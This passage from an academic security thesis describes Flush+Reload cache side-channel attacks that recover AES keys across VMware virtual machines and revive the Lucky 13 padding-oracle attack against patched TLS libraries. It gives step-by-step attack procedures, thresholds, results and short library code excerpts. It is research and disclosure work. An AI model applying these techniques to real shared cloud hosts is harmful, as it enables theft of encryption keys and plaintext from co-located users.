The level-2 cache is 8-way associative as well, with a cache line width of 64 bytes and a total size of 2^18 bytes. The level-3 cache is 12-way associative with a total size of 2^22 bytes and a 64-byte cache line size. It is important to note that each core has private L1 and L2 caches, but the L3 cache is shared among all cores. Together with the deduplication performed by the VMM, the shared L3 cache allows the adversary to learn about data accesses by the victim process.

The attack scenario is as follows: the victim process is an encryption server that handles encryption requests through a socket connection and sends back the ciphertext, similar to Bernstein's setup in [Ber04]. But unlike Bernstein's attack, where packages of at least 400 bytes were sent to deal with the noise, our server only receives packages of 16 bytes (the plaintext). The encryption key used by the server is unknown to the attacker. The attack process sends encryption queries to the victim process. All measurements, such as the timing of the reload step, are done on the attacker side. In our setup, each cache line holds 16 T table values, which results in a 7.6% probability of not accessing a given memory block per encryption. All given attack results target only the first cache line of each T table, i.e. the first 16 values of each T table for Flush and Reload. Note that in the attack any memory block of the T table would work equally well. Both the native and the cross-VM attack establish the threshold for selecting the correct ciphertext candidates for the monitored T table line by selecting those values which are below half of the average of the overall timings for each ciphertext value. This is an empirical threshold that we set after running some experiments, as follows:

threshold = (Σ_{i=0}^{255} t_i) / (2 · 256)

Spy process attack setup: The attack process runs in the same OS as the victim process.
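The empirical threshold above, half of the mean timing over all 256 ciphertext values, can be written out directly; the timing vector below is a synthetic stand-in for measured reload counters:

```python
def reload_threshold(timings):
    # threshold = (sum of t_i over all 256 ciphertext values) / (2 * 256)
    return sum(timings) / (2 * len(timings))

def low_candidates(timings):
    # Ciphertext values below the threshold, i.e. those for which the
    # monitored T table line was (almost) always reloaded from cache.
    thr = reload_threshold(timings)
    return [c for c, t in enumerate(timings) if t < thr]

# Synthetic example: 16 values always fast (cached), 240 mostly slow.
timings = [5] * 16 + [300] * 240
print(low_candidates(timings))
```

For this synthetic vector the threshold lands between the two clusters, so exactly the 16 fast values survive, mirroring the n = 16 T table positions of one cache line.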
The communication between the processes is carried out via a localhost connection, and timing is measured using the Read Time-Stamp Counter (rdtsc). The attack is set up to work across cores; the encryption server runs on a different core than the attacker. We believe that distinguishing between L3 and main memory accesses is more susceptible to noise than distinguishing between L1 cache accesses and main memory accesses. Therefore, while working with the L3 cache gives us a more realistic setting, it also makes the attack more challenging.

Cross-VM attack setup: In this attack, we use VMware ESXi 5.5.0 build 1623387 running Ubuntu 12.04 64-bit guest OSes. We know that VMware implements TPS with large pages (2 MB) or small pages (4 KB). We decided to use the latter, since it seems to be the default for most systems. Furthermore, as stated in [VMWb], even if large page sharing is selected, the VMM will still look for identical small pages to share. For the attack we used two virtual machines, one for the victim and one for the attacker. The communication between them is carried out over the local IP connection.

The results are presented in Figure 4.4, which plots the number of correctly recovered key bytes over the number of timed encryptions. The dash-dotted line shows that the spy-process scenario completely recovers the key after only 2^17 encryptions. Prior to moving to the cross-VM scenario, a single-VM scenario was run to gauge the impact of using VMs. The dotted line shows that due to the noise introduced by virtualization we need to nearly double the number of encryptions to match the key recovery performance of the native case.

Figure 4.4: Number of correct key bytes guessed of the AES-128 bit key vs. number of encryption requests. Even 50,000 encryptions (i.e. less than 5 seconds of interaction) result in significant security degradation in both the native machine as well as the cross-VM attack scenario.
The solid line gives the result for the cross-VM attack: 2^19 observations are sufficient for stable full key recovery. The difference might be due to cpuid-like instructions which are emulated by the hypervisor, thereby introducing more noise into the attack. In the worst case, both the native spy process and the single-VM attack took around 25 seconds (for 400,000 encryptions). We believe that this is due to communication via the localhost connection. However, when we perform a cross-VM attack, it takes roughly twice as much time as in the previous cases. In this case we are performing the communication via local IPs that have to reach the router, which is believed to add the additional delay. This means that all of the described attacks, even in the cross-VM scenario, completely recover the key in less than one minute!

4.4.6 Comparison to Other Attacks

Next we compare the most commonly implemented cache-based side channel attacks to the proposed attack. Results are shown in Table 4.1. It is difficult to compare the attacks, since most of them have been run on different platforms. Many of the prior attacks target the OpenSSL 0.9.8 version of AES.
Most of these attacks exploit the fact that AES has a separate T table for the last round, significantly reducing the noise introduced by cache miss accesses. Hence, attacks on OpenSSL 0.9.8 AES usually succeed much faster, a trend confirmed by our attack results.

Table 4.1: Comparison of cache side channel attack techniques against AES

Attack                       | Platform   | Methodology            | OpenSSL  | Traces
Spy-process based attacks:
Collision timing [BM06]      | Pentium 4E | Time measurement       | 0.9.8a   | 300,000
Prime+probe [OST06]          | Pentium 4E | L1 cache prime-probing | 0.9.8a   | 16,000
Evict+time [OST06]           | Athlon 64  | L1 cache evicting      | 0.9.8a   | 500,000
Flush+Reload (CFS) [GBK11]   | Pentium M  | Flush+reload w/ CFS    | 0.9.8m   | 100
Flush+Reload [IIES14b]       | i5-3320M   | L3 cache flush+reload  | 0.9.8a   | 8,000
Bernstein [AE13]             | Core2Duo   | Time measurement       | 1.0.1c   | 2^22
Flush+Reload [IIES14b]       | i5-3320M   | L3 cache flush+reload  | 1.0.1f   | 100,000
Cross-VM attacks:
Bernstein [IIES14a]^1        | i5-3320M   | Time measurement       | 1.0.1f   | 2^30
Our attack (VMware)          | i5-3320M   | L3 cache flush+reload  | 1.0.1f^2 | 400,000

^1 Only parts of the key were recovered, not the whole key.
^2 The AES implementation was not updated for the recently released OpenSSL 1.0.1g and 1.0.2 beta versions, so the results for those libraries are identical.

Note that our attack, together with [AE13] and [IIES14a], are the only ones that have been run on a 64-bit processor. Moreover, we assume that, due to undocumented internal states and advanced features such as hardware prefetchers, running the attack on a 64-bit processor adds more noise than on the older platforms. With respect to the number of encryptions, we observe that the proposed attack shows significant improvements over most of the previous attacks.

Spy process in native OS: Even though our attack runs in a noisier environment than Bernstein's attack, evict+time, and cache timing collision attacks, it shows better performance. Only prime and probe and Flush and Reload using CFS show either comparable or better performance.
The proposed attack has better performance than prime and probe even though their measurements were performed with the attack and the encryption being run as one single process. The Flush and Reload attack in [GBK11] exploits a much stronger leakage, which requires the attacker to interrupt the target AES between rounds (an unrealistic assumption). Furthermore, Flush and Reload with CFS needs to monitor the entire T tables, while our attack only needs to monitor a single line of the cache, making the attack much more lightweight and subtle.

Cross-VM attack: So far there is only one publication that has analyzed cache-based leakage across VMs for AES [IIES14a]. Our attack shows dramatic improvements over [IIES14a], which needs 2^29 encryptions (hours of run time) for a partial recovery of the key. Our attack only needs 2^19 encryptions to recover the full key. Thus, while the attack presented in [IIES14a] needs to interact with the target for several hours, our attack succeeds in under a minute and recovers the entire key. Note that the CFS-enabled Flush and Reload attack in [GBK11] will not work in the cross-VM setting, since the attacker has no control over the victim OS's CFS.

4.5 Flush and Reload Attacking Transport Layer Security: Reviving the Lucky 13 Attack

Although cache attacks are usually applied to cryptographic algorithms, virtually any security-critical software that has non-constant execution flow can be targeted by the Flush and Reload attack. In this section, we show an example of such an application. In particular, we show for the first time that cache attacks can be utilized to attack security protocols like the Transport Layer Security (TLS) protocol, by re-implementing the Lucky 13 attack that was believed to be closed by the security community. The Lucky 13 attack targets a vulnerability in the TLS (and DTLS) protocol design.
The vulnerability is due to the MAC-then-encrypt mode, in combination with the padding of the CBC encryption, also referred to as MEE-TLS-CBC. In the following, our description focuses on this popular mode. Vaudenay [Vau02] showed how the CBC padding can be exploited for a message recovery attack. AlFardan et al. [FP13] showed, more than 10 years later, that the subsequent MAC verification introduces timing behavior that makes the message recovery attack feasible in practical settings. In fact, their work includes a comprehensive study of the vulnerability of several TLS libraries. In this section we give a brief description of the attack. For a more detailed description, please refer to the original paper [FP13].

4.5.1 The TLS Record Protocol

The TLS record protocol provides encryption and message authentication for bulk data transmitted in TLS. The basic operation of the protocol is depicted in Figure 4.5. When a payload is sent, a sequence number and a header are attached to it and a MAC tag is generated by any of the available HMAC choices. Once the MAC tag is generated, it is appended to the payload together with a padding. The payload, tag, and pad are then encrypted using a block cipher in CBC mode. The final message is formed by the encrypted ciphertext plus the header. Upon receiving an encrypted packet, the receiver decrypts the ciphertext with the session key that was negotiated in the handshake process. Next, the padding and the MAC tag need to be removed. For this, the receiver first checks whether the size of the ciphertext is a multiple of the block size and makes sure that the ciphertext can accommodate at minimum a zero-length record, a MAC tag, and at least one byte of padding. After decryption, the receiver checks if the recovered padding matches one of the allowed patterns.
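The sending-side flow just described (MAC over sequence number, header and data, then pad, then CBC-encrypt) can be sketched as follows. The block cipher here is a toy XOR construction standing in for AES, so the CBC algebra holds but it is of course not secure, and all keys and field values are illustrative:

```python
import hashlib
import hmac
import os

BLOCK = 16

def toy_encrypt_block(key, block):
    # Toy stand-in for AES: XOR with a key-derived pad (NOT secure).
    pad = hashlib.sha256(key).digest()[:BLOCK]
    return bytes(a ^ b for a, b in zip(block, pad))

toy_decrypt_block = toy_encrypt_block  # XOR is its own inverse

def cbc_encrypt(key, iv, plaintext):
    # C_i = E_k(P_i xor C_{i-1}), with C_0 = IV.
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, bytes(
            a ^ b for a, b in zip(plaintext[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)

def tls_pad(length):
    # TLS padding: n + 1 bytes, each with value n.
    n = BLOCK - (length + 1) % BLOCK
    return bytes([n]) * (n + 1)

def mee_tls_cbc(enc_key, mac_key, sqn, header, data):
    # MAC-then-encrypt: tag over sequence number || header || data,
    # then pad to a block boundary and CBC-encrypt payload || tag || pad.
    tag = hmac.new(mac_key, sqn + header + data, hashlib.sha1).digest()
    payload = data + tag
    payload += tls_pad(len(payload))
    iv = os.urandom(BLOCK)
    return header + iv + cbc_encrypt(enc_key, iv, payload)
```

On the receiving side the same structure is undone in reverse: CBC-decrypt, strip the padding, strip the tag, and recompute the MAC over the recovered payload.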
Figure 4.5: Encryption and authentication in the TLS record protocol when using HMAC and a block cipher in CBC mode.

A standard way to implement this decoding step is to check the last byte of the plaintext, and to use it to determine how many of the trailing bytes belong to the padding. Once the padding is removed and the plain payload is recovered, the receiver attaches the header and the sequence number and performs the HMAC operation. Finally, the computed tag is compared to the received tag. If they are equal, the contents of the message are concluded to have been securely transmitted.

4.5.2 HMAC

The TLS record protocol uses the HMAC algorithm to compute the tag. The HMAC algorithm is based on a hash function H and performs the following operations:

HMAC(K, M) = H((K ⊕ opad) || H((K ⊕ ipad) || M))

Common choices for H in TLS 1.2 are SHA-1, SHA-256 and the now defunct MD5. The message M is padded with a single 1 bit followed by zeros and an 8 byte length field. The pad aligns the data to a multiple of 64 bytes. K ⊕ opad already forms a 64 byte field, as does K ⊕ ipad. Therefore, the minimum number of compression function calls for an HMAC operation is 4. This means that, depending on the number of bytes of the message, the HMAC operation is going to take more or fewer compression function calls. To illustrate this, we repeat the example given in [FP13]. Assume that the plaintext size is 55 bytes. In this case an 8 byte length field is appended together with a padding of size 1, so that the total size is 64 bytes. In total, the HMAC operation is going to take four compression function calls. However, if the plaintext size is 58 bytes, an 8 byte length field is attached and 62 bytes of padding are appended to make the total size equal to 128 bytes. In this case, the total number of compression function calls is going to be equal to five.
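The length dependence described above can be made concrete with a small counting function (for a 64-byte-block hash such as SHA-1, counting both the inner and the outer hash of HMAC):

```python
def hash_blocks(n):
    # A 64-byte-block hash pads with one 0x80 byte, zeros, and an
    # 8-byte length field, so n bytes take ceil((n + 9) / 64) calls.
    return (n + 9 + 63) // 64

def hmac_compressions(msg_len, digest_len=20):
    # Inner hash: the 64-byte (K xor ipad) block plus the message.
    # Outer hash: the 64-byte (K xor opad) block plus the inner digest.
    return hash_blocks(64 + msg_len) + hash_blocks(64 + digest_len)

print(hmac_compressions(55))  # 55-byte message -> 4 calls
print(hmac_compressions(58))  # 58-byte message -> 5 calls
```

The jump from 4 to 5 compression function calls between 55 and 56 input bytes is exactly the boundary the Lucky 13 attack probes.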
Distinguishing the number of performed compression function calls is the basic idea that enables the Lucky 13 attack.

4.5.3 CBC Encryption & Padding

Until the support of the Galois Counter Mode in TLS 1.2, block ciphers were always used in cipher block chaining (CBC) mode in TLS. The decryption of each block C_i of a ciphertext is performed as follows:

P_i = D_k(C_i) ⊕ C_{i−1}

Here, P_i is the plaintext block and D_k(·) is the decryption under key k. For the prevalent AES, the block size is 16 bytes. The size of the message to be encrypted in CBC mode must indeed be a multiple of the cipher block size. The TLS protocol specifies the padding as follows: the last padding byte indicates the length of the padding, and the value of the remaining padding bytes is equal to the number of padding bytes needed. This means that if 3 bytes of padding are needed, the correct padding has to be 0x02|0x02|0x02. Possible TLS paddings are: 0x00, 0x01|0x01, 0x02|0x02|0x02, up to 0xff|0xff|...|0xff. Note that there are several valid paddings for each message length.

4.5.4 An Attack on CBC Encryption

We now discuss the basics of the Lucky 13 attack. For the purposes of this study the target cipher is AES in CBC mode, as described above. Again, we use the same example that AlFardan et al. gave in [FP13]. Assume that the sender is sending 4 non-IV blocks of 16 bytes each, one IV block, and the header. Let us further assume that we are using SHA-1 to compute the MAC tag, in which case the digest size is 20 bytes. The header has a fixed length of 5 bytes and the sequence number has a total size of 8 bytes. The payload would look like this:

HDR | C_IV | C_1 | C_2 | C_3 | C_4

Now assume that the attacker XORs a mask ∆ into C_3. The decryption of C_4 is then:

P*_4 = D_k(C_4) ⊕ C_3 ⊕ ∆ = P_4 ⊕ ∆

Focusing on the last two bytes P*_4(14) | P*_4(15), three possible scenarios emerge:

Invalid padding: This is the most probable case, where the plaintext ends with an invalid padding.
Therefore, according to the TLS protocol, this is treated as zero padding. 20 bytes of MAC (SHA-1) are removed and the corresponding HMAC operation on the client side is performed on 44 bytes plus 13 bytes of header, 57 bytes in total. Therefore the HMAC evaluates 5 compression function calls.

Valid 0x00 padding: If P*_4(15) is 0x00, this is considered a valid padding, and a single byte of padding is removed. Then the 20 bytes of digest are removed, and the HMAC operation on the client side is done on 43 + 13 bytes, 56 in total, which takes 5 compression function calls.

Any other valid padding: For instance, if we consider a valid padding of two bytes, the valid padding would be 0x01|0x01 and 2 bytes of padding are removed. Then 20 bytes of digest are removed, and the HMAC operation is performed over 42 + 13 = 55 bytes, which means four compression function calls.

The Lucky 13 attack is based on detecting this difference between 4 and 5 compression function calls. Recall that if an attacker knows that a valid 0x01|0x01 padding was achieved, she can directly recover the last two bytes of P_4, since

0x01|0x01 = P_4(14)|P_4(15) ⊕ ∆(14)|∆(15)

Note that a successful 0x01|0x01 padding is more likely to be achieved than any other, longer valid padding, and therefore the attacker can be confident enough that this is the padding that was forged. Furthermore, she can keep trying to recover the remaining bytes once she knows the first 2 bytes. The attacker needs to perform at most 2^16 trials to recover the last two bytes, and then up to 2^8 messages for each further byte that she wants to recover.

4.5.5 Analysis of Lucky 13 Patches

The Lucky 13 attack triggered a series of patches for all major implementations of TLS [FP13]. In essence, all libraries were fixed to remove the timing side channel exploited by Lucky 13, i.e. implementations were updated to handle different CBC paddings in constant time.
However, different libraries used different approaches to achieve this:

•Some libraries implement dummy functions or processes,
•Others use dummy data to process the maximum allowed padding length in each MAC check.

In the following, we discuss these different approaches for some of the most popular TLS libraries.

4.5.6 Patches Immune to Flush and Reload

In this section we analyze those libraries that are secure against the Flush and Reload technique.

•OpenSSL: The Lucky 13 vulnerability was fixed in OpenSSL versions 1.0.1, 1.0.0k, and 0.9.8y by February 2013, without the use of a time-consuming dummy function, by using dummy data. Basically, when a packet is received, the padding variation is considered and the maximum number of HMAC compression function evaluations needed to equalize the time is calculated. Then each compression function is computed directly, without calling any external function. For every message, the maximum number of compression functions is executed, so that no information is leaked through the timing channel in the case of incorrect padding. Furthermore, the OpenSSL patch removed any data-dependent branches, ensuring a fixed, data-independent execution flow. This is a generic solution for attacks related to microarchitectural leakage, i.e. cache timing or even branch prediction attacks.

•Mozilla NSS: This library was patched against the Lucky 13 attack in version 3.14.3 by using a constant time HMAC processing implementation. This implementation follows the approach of OpenSSL, calculating the maximum number of compression functions needed for a specific message and then computing the compression functions directly. This provides a countermeasure not only for timing and cache access attacks, but also for branch prediction attacks.

•MatrixSSL: MatrixSSL was fixed against Lucky 13 with the release of version 3.4.1 by adding timing countermeasures that reduce the effectiveness of the attack.
In the fix, the library authors implemented a decoding scheme that does a sanity check on the largest possible block size. In this scheme, when the received message's padding length is incorrect, MatrixSSL runs a loop as if there were a full 256 bytes of padding. When there are no padding errors, the same operations are executed as in the case of an incorrect padding, to sustain a constant time. Since there are no functions that are specifically called in the successful or unsuccessful padding cases, this library is not vulnerable to our Flush and Reload attack. In addition, MatrixSSL keeps track of all errors in the padding decoding and does the MAC check regardless of valid or invalid padding, rather than interrupting and finalizing the decoding process at the first error.

4.5.7 Patches Vulnerable to Flush and Reload

There are some patches that ensure constant time execution, and are therefore immune to the original Lucky 13 attack [FP13], but which are vulnerable to Flush and Reload. This implies a dummy function call or a different function call tree for valid and invalid paddings. Furthermore, if these calls are preceded by branch predictions, these patches might also be exploitable by branch prediction attacks. Some examples, including code snippets, are given below.

•GnuTLS: uses a dummy wait function that performs an extra compression function whenever the padding is incorrect. This function makes the response time constant to fix the original Lucky 13 vulnerability. Since this function is only called in the case of incorrect padding, it can be detected by a co-located VM running a Flush and Reload attack.

  if (memcmp(tag, &ciphertext->data[length], tag_size) != 0 || pad_failed != 0)
    /* HMAC was not the same. */
    {
      dummy_wait(params, compressed, pad_failed, pad, length + preamble_size);
    }

•PolarSSL: uses a dummy function called md_process to sustain constant time to fix the original Lucky 13 vulnerability.
Basically, the number of extra runs for a specific message is computed and the corresponding compressions are added by md_process. Whenever this dummy function is called, a co-located adversary can learn that the last padding was incorrect and use this information to realize the Lucky 13 attack.

  for (j = 0; j < extra_run; j++)
      md_process(&ssl->transform_in->md_ctx_dec, ssl->in_msg);

•CyaSSL: was fixed against Lucky 13 with the release of 2.5.0, on the same day the Lucky 13 vulnerability became public. In the fix, CyaSSL implements a timing-resistant pad/verify check function called TimingPadVerify, which uses the PadCheck function with dummy data for all padding length cases, whether or not the padding length is correct. CyaSSL also does all the calculations, such as the HMAC calculation, for the incorrect padding cases, which not only fixes the original Lucky 13 vulnerability but also prevents the detection of incorrect padding cases. This is due to the fact that the PadCheck function is called for both correctly and incorrectly padded messages, which makes it impossible to detect with our Flush and Reload attack. However, for correctly padded messages, CyaSSL calls the CompressRounds function, which is detectable with Flush and Reload. Therefore, we monitor the correct padding cases instead of the incorrect ones.

Correct padding case:

  PadCheck(dummy, (byte)padLen, MAX_PAD_SIZE - padLen - 1);
  ret = ssl->hmac(ssl, verify, input, pLen - padLen - 1 - t, content, 1);
  CompressRounds(ssl, GetRounds(pLen, padLen, t), dummy);
  if (ConstantCompare(verify, input + (pLen - padLen - 1 - t), t) != 0)

Incorrect padding case:

  CYASSL_MSG("PadCheck failed");
  PadCheck(dummy, (byte)padLen, MAX_PAD_SIZE - padLen - 1);
  ssl->hmac(ssl, verify, input, pLen - t, content, 1); /* still compare */
  ConstantCompare(verify, input + pLen - t, t);

4.5.8 Reviving Lucky 13 on the Cloud

As the cross-network timing side channel has been closed (cf.
Section 4.5.5), the Lucky 13 attack as originally proposed no longer works on the recent releases of most cryptographic libraries. In this work, we revive the Lucky 13 attack to target some of these (fixed) releases by gaining information through co-located VMs (a leakage channel not considered in the original paper) rather than through the network timing exploited in the original attack.

4.5.8.1 Regaining the Timing Channel

Most cryptographic libraries and implementations have been largely fixed to yield an almost constant time when the MAC processing time is measured over the network. As discussed in Section 4.5.5, although there are some similarities in these patches, there are also subtle differences which, as we shall see, have significant implications for security. Some of the libraries not only closed the timing channel but also various cache access channels. In contrast, other libraries left an open door to access-driven cache attacks on the protocol. In this section we analyze how an attacker can gain information about the number of compression functions performed during the HMAC operation by making use of leakages due to the shared memory hierarchy in VMs located on the same machine. This is sufficient to re-implement the Lucky 13 attack. More precisely, during MAC processing, depending on whether or not the actual MAC check terminates early, some libraries call a dummy function to equalize the processing time. Knowing whether this dummy function is called reveals whether the received packet was processed as having an invalid padding, a zero-length padding, or any other valid padding.

Figure 4.6: Histogram of network time measured for sent packages with valid (4 compression functions) and invalid (5 compression functions) paddings.
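How such an execution-flow oracle feeds back into Lucky 13 can be illustrated with a toy simulation: a function models whether the victim's decryption hits the 0x01|0x01 padding case (the 4 versus 5 compression-function difference observed through the cache), and the attacker brute-forces the mask ∆. Random bytes stand in for the fixed block decryption D_k(C_4); none of this is real library code:

```python
import os
from itertools import product

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

d_c4 = os.urandom(16)  # stands in for D_k(C4): fixed, unknown to the attacker
c3 = os.urandom(16)
p4 = xor(d_c4, c3)     # true last plaintext block: P4 = D_k(C4) xor C3

def oracle(delta):
    # Models the Flush+Reload observation: True iff the masked record
    # decrypts to a valid 0x01|0x01 padding (4 compression functions).
    p_star = xor(d_c4, xor(c3, delta))   # P4* = P4 xor delta
    return p_star[14] == 0x01 and p_star[15] == 0x01

# Brute-force the last two mask bytes: at most 2^16 trials.
for a, b in product(range(256), repeat=2):
    if oracle(bytes(14) + bytes([a, b])):
        recovered = bytes([0x01 ^ a, 0x01 ^ b])
        break

assert recovered == p4[14:16]  # last two bytes of P4 recovered
```

In the real attack each oracle query costs one TLS session (the session dies on the decryption failure), which is why the multi-session setting with a repeated plaintext is required.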
In general, any difference in the execution flow between handling a well-padded message, a zero-padded message, or an invalidly padded message enables the Lucky 13 attack. This information is gained by the Flush and Reload technique if the cloud system enables deduplication features. To validate this idea, we ran two experiments:

•In the first experiment we generated encrypted packets using a PolarSSL client with valid and invalid paddings and measured the network time, as shown in Figure 4.6. Note that the two network-time distributions obtained for valid and invalid paddings are essentially indistinguishable, as intended by the patches.

•In the second experiment we see a completely different picture. Using PolarSSL we generated encrypted packets with valid and invalid paddings, which were then sent to a PolarSSL server. Here, instead, we measured the time it takes to load a specifically chosen PolarSSL library function from inside a co-located VM. Figure 4.7 shows the probability distributions for a function reloaded from the L3 cache vs. a function reloaded from main memory. The two distributions are clearly distinguishable, and the misidentification rate (the area under the overlapping tails in the middle of the two distributions) is very small. Note that this substitute timing channel provides much more precise timing than the network time. To see this more clearly, we refer the reader to Figure 2 in [FP13], where the network time is measured to obtain two overlapping Gaussians by measurements with OpenSSL-encrypted traffic. This is not a surprise, since the network channel is significantly noisier.

In conclusion, we regain a much more precise timing channel by exploiting the discrepancy between L3 cache and memory accesses as measured by a co-located attacker. In what follows, we define the attack scenario more concretely, and then precisely define the steps of the new attack.
Figure 4.7: Histogram of access time measured for a function call served from the L3 cache vs. a function call served from main memory.

4.5.8.2 New Attack Scenario

In our attack scenario, the side channel information is gained by monitoring the cache from a co-located VM. As in [FP13], we assume that the adversary captures, modifies, and replaces any message sent to the victim. However, TLS sessions work in such a way that when the protocol fails to decrypt a message, the session is closed. This is the reason why we focus on multi-session attacks, where the same plaintext is sent to the victim in the same position in every session, e.g. an encrypted password sent during user authentication. The fact that we are working with a different method in a different scenario gives us some advantages and disadvantages over the previous Lucky 13 work:

Advantages:

•Recent patches in cryptographic libraries mitigate the old Lucky 13 attack, but are still vulnerable in the new scenario.

•In the new scenario, no response from the server is needed. The old Lucky 13 attack needed a response to measure the time, which yielded a noisier environment in TLS than in DTLS.

•The new attack does not suffer from network channel noise. This source of noise was painful for the measurements, as we can see in the original paper, where in the case of TLS as many as 2^14 trials were necessary to guess a single byte value.

Disadvantages:

•Assumption of co-location: To target a specific victim, the attacker has to be co-located with that target. Alternatively, the attacker could simply reside on a physical machine and wait for some potential random victim running a TLS operation.

•Other sources of noise: The attacker no longer has to deal with network channel noise, but still has to deal with other microarchitectural sources of noise, such as instruction prefetching.
This new source of noise translates into more traces being needed, but, as we will see, far fewer than in the original Lucky 13 attack. In Section 7.5 we explain how to deal with this new noise.

4.5.8.3 Attack Description

In this section we describe how an attacker uses the Flush and Reload technique to gain information about the plaintext that is being sent to the victim.

•Step 1: Function identification: Identify the different function calls in the TLS record decryption process to learn which target functions are suitable for the spy process. The attacker can either calculate the offset of the function she is trying to monitor within the library, and then add the corresponding offset when Address Space Layout Randomization (ASLR) moves her user address space, or she can disable ASLR in her own VM and directly use the virtual address corresponding to the function she is monitoring.

•Step 2: Capture packet, mask and replace: The attacker captures the packet that is being sent and masks it in those positions that are useful for the attack. Then she sends the modified packet to the victim.

•Step 3: Flush targeted function from cache: The Flush and Reload process starts after the attacker replaces the original packet and sends the modified version. The co-located VM flushes the targeted function to ensure that no one but the victim can have run it. Any subsequent execution of the targeted function will result in a faster reload time during the reload step.

•Step 4: Reload target function and measure: Reload the corresponding function memory line and measure the reload time. According to a threshold that we set based on experimental measurements, we decide whether the dummy function was loaded from the cache (implying that the victim executed the dummy function earlier) or from main memory (implying the opposite).
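The decision made in steps 2–4 can be sketched end to end. In this minimal Python model the hardware primitives (clflush, the rdtsc-timed reload, the victim's packet processing) are replaced by hypothetical stand-ins, so everything below is an illustrative assumption rather than real attack code:

```python
THRESHOLD = 300  # cycles; assumed boundary between L3 and DRAM reloads

def flush(addr, cache):
    cache.discard(addr)                # stand-in for clflush (Step 3)

def reload_time(addr, cache):
    # stand-in for an rdtsc-timed load: fast if cached, slow otherwise
    return 220 if addr in cache else 420

def victim_executed_dummy(process_packet, dummy_fn, cache):
    flush(dummy_fn, cache)             # Step 3: evict the target function
    process_packet(cache)              # Step 2: victim handles our packet
    t = reload_time(dummy_fn, cache)   # Step 4: timed reload
    return t < THRESHOLD               # True -> dummy function was called

# Hypothetical victim code paths: one calls the dummy function,
# the other does not.
calls_dummy = lambda cache: cache.add("dummy_fn")
skips_dummy = lambda cache: None
print(victim_executed_dummy(calls_dummy, "dummy_fn", set()))  # True
print(victim_executed_dummy(skips_dummy, "dummy_fn", set()))  # False
```

The single boolean per packet is exactly the padding-validity signal the Lucky 13 attack needs.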
Since the attacker has to deal with instruction prefetching, she constantly runs Flush and Reload for a specified period of time. The attacker can therefore distinguish between functions that were merely preloaded and functions that were preloaded and executed, since the latter stay in the cache for a longer period of time.

4.5.9 Experiment Setup and Results

In this section we present our test environment, together with our detection method for avoiding the cache prefetching techniques that affect our measurements. Finally, we present the results of our experiments for the PolarSSL, GnuTLS and CyaSSL libraries.

4.5.9.1 Experiment Setup

The experiments were run on an Intel i5-650 dual core at 3.2 GHz. Our physical server includes a 256 KB per-core L2 cache and a 4 MB L3 cache shared between both cores. We used VMware ESXi 5.5.0, build number 162338, for virtualization. TPS (Transparent Page Sharing) is enabled with 4 KB pages. In this setting, our Flush and Reload technique can distinguish between L3 cache and main memory accesses.

For the TLS connection, we use an echo server, which reads and re-sends the message that it receives, and a client communicating with it. Client and echo server run in different virtual machines, both using Ubuntu 12.04 as the guest OS. We modify the echo server so that it adds a jitter to the encrypted reply message, modeling the man-in-the-middle attack. Once the message is sent, the echo server uses Flush and Reload to detect the different function calls and concludes whether the padding was correct or not.

4.5.9.2 Dealing with Cache Prefetching

Modern CPUs implement cache prefetching in a number of ways. These techniques affect our experiments, since the monitored function can be prefetched into the cache even if it was not executed by the victim process. To avoid false positives, it is not sufficient to detect whether the monitored functions were loaded into the cache; we must also determine how long they have resided there.
This is achieved by counting the number of subsequent detections of the given function in one execution. Thus, the attack process effectively distinguishes between prefetched functions and prefetched-and-executed functions. We use experiments to determine a threshold (which differs across the libraries) that distinguishes a prefetch-and-execute from a mere prefetch. For PolarSSL this threshold is based on observing three Flush and Reload accesses in a row. Assume that n is the number of subsequent accesses required to conclude that the function was executed. In the following, we present the required hits for the different libraries, i.e. the number of n-access sequences required to decide whether the targeted function was executed or not.

4.5.9.3 Attack on PolarSSL 1.3.6

Our first attack targets PolarSSL 1.3.6 with TLS 1.1. In the first scenario the attacker modifies the last two bytes of the encrypted message until she finds the ∆ that leads to a 0x01|0x01 padding. Recall that 2^16 different variations of the message can be tried. The first plot shows the success probability of guessing the right ∆ versus L, where L refers to the number of 2^16-trace batches needed. For example, L = 4 means that 2^16 * 4 messages are needed to detect the right ∆. Based on experimental results, we set the access threshold such that we consider a hit whenever the targeted function gets two accesses in a row.

The measurements were performed for different numbers of required hits. Figure 4.8 shows that requiring a single hit might not suffice, since the attacker gets false positives or, for a small number of messages, may miss the access altogether.

Figure 4.8: (PolarSSL 1.3.6) Success probability of recovering P_14 and P_15 vs. L, for different numbers of hits required. L refers to the number of 2^16-trace batches needed, so the total number of messages is 2^16 * L.
However, when we require two hits and the attacker has a sufficient number of messages (in this case L = 2^3), the probability of guessing the right ∆ is comfortably close to one. If the attacker increases the limit further to ensure an even lower number of false positives, she will need more messages to see the required number of hits. In the case of 3 hits, L = 2^4 is required for a success probability close to one.

Figure 4.9 shows the success probability of correctly recovering P_13, once the attacker has recovered the last two bytes. Now the attacker is looking for the padding 0x02|0x02|0x02. We observed behavior similar to the previous case: with L = 8 and a two-hit requirement we recover the correct byte with high probability. Again, if the attacker increases the requirement to 3 hits, she will need more measurements; about L = 16 is sufficient in practice.

Figure 4.9: (PolarSSL 1.3.6) Success probability of recovering P_13, assuming P_14 and P_15 known, vs. L, for different numbers of hits required. L refers to the number of 2^8-trace batches needed, so the total number of messages is 2^8 * L.

4.5.9.4 CyaSSL 3.0.0

Recall that the attack is much more effective if the attacker knows any of the preceding bytes of the plaintext, for example the last byte P_15. This would be the case in a Javascript/web setting where, by adjusting the length of an initial HTTP request, an attacker can ensure that there is only one unknown byte in the HTTP plaintext. In this case, the attacker would not need to try 2^16 possible variations but only 2^8 variations for each byte that she wants to recover. This is the scenario that we analyzed with CyaSSL TLS 1.2, where we assumed that the attacker knows P_15 and wants to recover P_14.
Now the attacker is again trying to obtain a 0x01|0x01 padding, but unlike in the previous case, she knows the ∆ that makes the last byte equal to 0x01. The implementation of CyaSSL behaves very similarly to that of PolarSSL: due to the access threshold, a single hit might lead to false positives. However, requiring two hits with a sufficient number of measurements is enough to obtain a success probability very close to one. The threshold is set as in the previous cases, where a hit is counted whenever we observe two Flush and Reload accesses in a row.

Figure 4.10: (CyaSSL 3.0.0) Success probability of recovering P_14, assuming P_15 known, vs. L, for different numbers of hits required. L refers to the number of 2^8-trace batches needed, so the total number of messages is 2^8 * L.

4.5.9.5 GnuTLS 3.2.0

